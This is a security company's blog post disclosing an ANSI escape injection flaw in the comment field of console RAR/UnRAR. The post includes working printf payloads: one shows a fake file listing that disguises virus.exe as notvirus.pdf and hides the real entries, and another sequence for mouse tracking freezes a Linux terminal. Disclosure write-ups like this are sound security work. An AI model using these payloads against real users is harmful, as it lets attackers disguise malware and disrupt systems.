Skip to main content

    Overview of the update

    On February 28, 2024, RARLAB released an update for WinRAR, which fixed an ANSI escape injection vulnerability that I had found in the console versions of RAR and UnRAR, affecting versions 6.24 and earlier. This vulnerability, tracked as CVE-2024-33899 for Linux and Unix systems and CVE-2024-36052 for Windows, allowed attackers to spoof the file list or perform a local service attack (Linux and Unix only).

    In this post, I will walk through how this vulnerability works and demonstrate a proof of concept. Although I demonstrate this on a Linux system, the same can be done on a Windows or Unix system.

    Background

    If you are familiar with the command line in Linux, Unix or Windows, you may be familiar with programs like Vim and Neofetch. These programs use ANSI escape sequences to change text and background color, control the cursor and create GUI in the terminal.

    1-1

    Although ANSI escape sequences can be used to create cool programs for the terminal, they can also be used for malicious ones, as shown in Stok Fredrik's DEFCON lecture.

    WinRAR offers console RAR and UnRAR that can be used to create and extract RAR archives. As shown in the image below, RAR files support comments, which are displayed when the contents of the archive file are listed using unrar l demo.rar.

    2 (1)

     

    To check if ANSI escape sequences are filtered out or not in the comment field, we can use a simple payload that displays `THIS IS GREEN` in the color green.

    printf 'Hello \033[32mTHIS IS GREEN\033[0m\007' | rar c demo.rar

     

    When we run rar l demo.rar, we can see that THIS IS GREEN is printed in green. This shows that the comment field is not filtering ANSI escape sequences in the output.

    3 (1)

     

    Exploitation.

    The vulnerability can be exploited in many different ways, but we will use an attack suitable for WinRAR as a demonstration.

    First, we put the file virus.exe into a rar file:

    $ ls

    virus.exe

    $ rar a demo.rar virus.exe

     

    Then we add the following payload in the comment field:

    printf 'Archive: demo.rar\nDetails: RAR 5\n\nAttributes Size Date Time Name\n----------- --------- ---------- ----- ---------\n-rw-r--r-- 7 2024-05-19 16:26 notvirus.pdf\n----------- --------- ---------- ----- ---------\n7 1\e[8m' | rar c demo.rar

     

     

    This payload contains a fake list where virus.exe is replaced with notvirus.pdf. The ANSI escape sequence \e[8m is used to hide all content after the comment section in the output. The result is that the actual file entry is hidden and our fake file entry is shown. In the screenshot below, you can see a large gap between the output and the shell prompt. This gap is due to the original file list being printed but made invisible using \e[8m. Experienced command line users may find this suspicious, but less experienced users can easily be fooled.

    4-1

    As mentioned, there are two CVEs associated with this vulnerability due to its significantly higher severity on Linux and Unix systems compared to Windows. This is because certain ANSI escape sequences can be used to achieve a local service attack on Linux and Unix systems.

    The payload below, taken from Stok Fredrik's Black Hat slides, captures all cursor movements and prints the coordinates to the terminal. This only works on Linux and Unix systems. When tested on a Kali Linux VM, the cursor coordinates were sent out to the terminal and the VM was later frozen.

     

    \033[ ?1001h\033[?1002h\033[?1003h\033[?1004h\033[?1005h\033[?1006h\033[?1007h\033[?1015h\033[?10016h\

     

    dos

    While there is limited research on ANSI escape sequences, it is clear that attackers with a deep understanding of ANSI escape sequences can exploit them in a creative, malicious and sometimes even annoying way.

     

    Do you have questions about IT security? Fill in the form below, and we will get back to you:

     

    Oslo

    Drammensveien 288

    0283 Oslo

    Bergen

    Sandviksbodene 1

    5035 Bergen

    Stavanger

    Kanalsletta 4

    4033 Stavanger

    Grimstad

    Bark Silas vei 5

    4876 Grimstad

    Kristiansand

    Dronningens gt 12

    4610 Kristiansand

    Trondheim

    Krambugata 2

    7011 Trondheim

    Stockholm

    Kammakargatan 22

    111 40 Stockholm